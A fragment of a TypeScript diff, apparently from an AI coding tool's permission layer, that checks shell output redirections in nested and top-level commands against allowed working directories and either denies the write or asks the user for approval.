+ // catches this via the same synthetic-CommandExpressionAst mechanism —
1925
+ // this is belt-and-suspenders so the nested loop doesn't rely on that
1926
+ // accident. Placed AFTER the path loop so specific asks (blockedPath,
1927
+ // suggestions) win via ??=.
1928
+ if (hasExpressionPipelineSource) {
1929
+ firstAsk ??= {
1930
+ behavior: 'ask',
1931
+ message: `${resolveToCanonical(cmd.name)} appears inside a control-flow or chain statement where piped expression sources cannot be statically validated and requires manual approval`,
1932
+ }
1933
+ }
1934
+ }
1935
+ }
1936
+
1937
+ // Check redirections on nested commands (e.g., from && / || chains)
1938
+ if (statement.nestedCommands) {
1939
+ for (const cmd of statement.nestedCommands) {
1940
+ if (cmd.redirections) {
1941
+ for (const redir of cmd.redirections) {
1942
+ if (redir.isMerging) continue
1943
+ if (!redir.target) continue
1944
+ if (isNullRedirectionTarget(redir.target)) continue
1945
+
1946
+ const { allowed, resolvedPath, decisionReason } = validatePath(
1947
+ redir.target,
1948
+ cwd,
1949
+ toolPermissionContext,
1950
+ 'create',
1951
+ )
1952
+
1953
+ if (!allowed) {
1954
+ const workingDirs = Array.from(
1955
+ allWorkingDirectories(toolPermissionContext),
1956
+ )
1957
+ const dirListStr = formatDirectoryList(workingDirs)
1958
+
1959
+ const message =
1960
+ decisionReason?.type === 'other' ||
1961
+ decisionReason?.type === 'safetyCheck'
1962
+ ? decisionReason.reason
1963
+ : `Output redirection to '${resolvedPath}' was blocked. For security, Claude Code may only write to files in the allowed working directories for this session: ${dirListStr}.`
1964
+
1965
+ if (decisionReason?.type === 'rule') {
1966
+ return {
1967
+ behavior: 'deny',
1968
+ message,
1969
+ decisionReason,
1970
+ }
1971
+ }
1972
+
1973
+ firstAsk ??= {
1974
+ behavior: 'ask',
1975
+ message,
1976
+ blockedPath: resolvedPath,
1977
+ decisionReason,
1978
+ suggestions: [
1979
+ {
1980
+ type: 'addDirectories',
1981
+ directories: [getDirectoryForPath(resolvedPath)],
1982
+ destination: 'session',
1983
+ },
1984
+ ],
1985
+ }
1986
+ }
1987
+ }
1988
+ }
1989
+ }
1990
+ }
1991
+
1992
+ // Check file redirections
1993
+ if (statement.redirections) {
1994
+ for (const redir of statement.redirections) {
1995
+ if (redir.isMerging) continue
1996
+ if (!redir.target) continue
1997
+ if (isNullRedirectionTarget(redir.target)) continue
1998
+
1999
+ const { allowed, resolvedPath, decisionReason } = validatePath(
2000
+ redir.target,
2001
+ cwd,
2002
+ toolPermissionContext,
2003
+ 'create',
2004
+ )
2005
+
2006
+ if (!allowed) {
2007
+ const workingDirs = Array.from(
2008
+ allWorkingDirectories(toolPermissionContext),
2009
+ )
2010
+ const dirListStr = formatDirectoryList(workingDirs)
2011
+
2012
+ const message =
2013
+ decisionReason?.type === 'other' ||
2014
+ decisionReason?.type === 'safetyCheck'
2015
+ ? decisionReason.reason
2016
+ : `Output redirection to '${resolvedPath}' was blocked. For security, Claude Code may only write to files in the allowed working directories for this session: ${dirListStr}.`
2017
+
2018
+ if (decisionReason?.type === 'rule') {
2019
+ return {
2020
+ behavior: 'deny',
2021
+ message,
2022
+ decisionReason,
2023
+ }
2024
+ }
2025
+
2026
+ firstAsk ??= {
2027
+ behavior: 'ask',
2028
+ message,
2029
+ blockedPath: resolvedPath,
2030
+ decisionReason,
2031
+ suggestions: [
2032
+ {
2033
+ type: 'addDirectories',
2034
+ directories: [getDirectoryForPath(resolvedPath)],
2035
+ destination: 'session',
2036
+ },
2037
+ ],
2038
+ }
2039
+ }
2040
+ }
2041
+ }
2042
+
2043
+ return (
2044
+ firstAsk ?? {
2045
+ behavior: 'passthrough',
2046
+ message: 'All path constraints validated successfully',
2047
+ }
2048
+ )
2049
+ }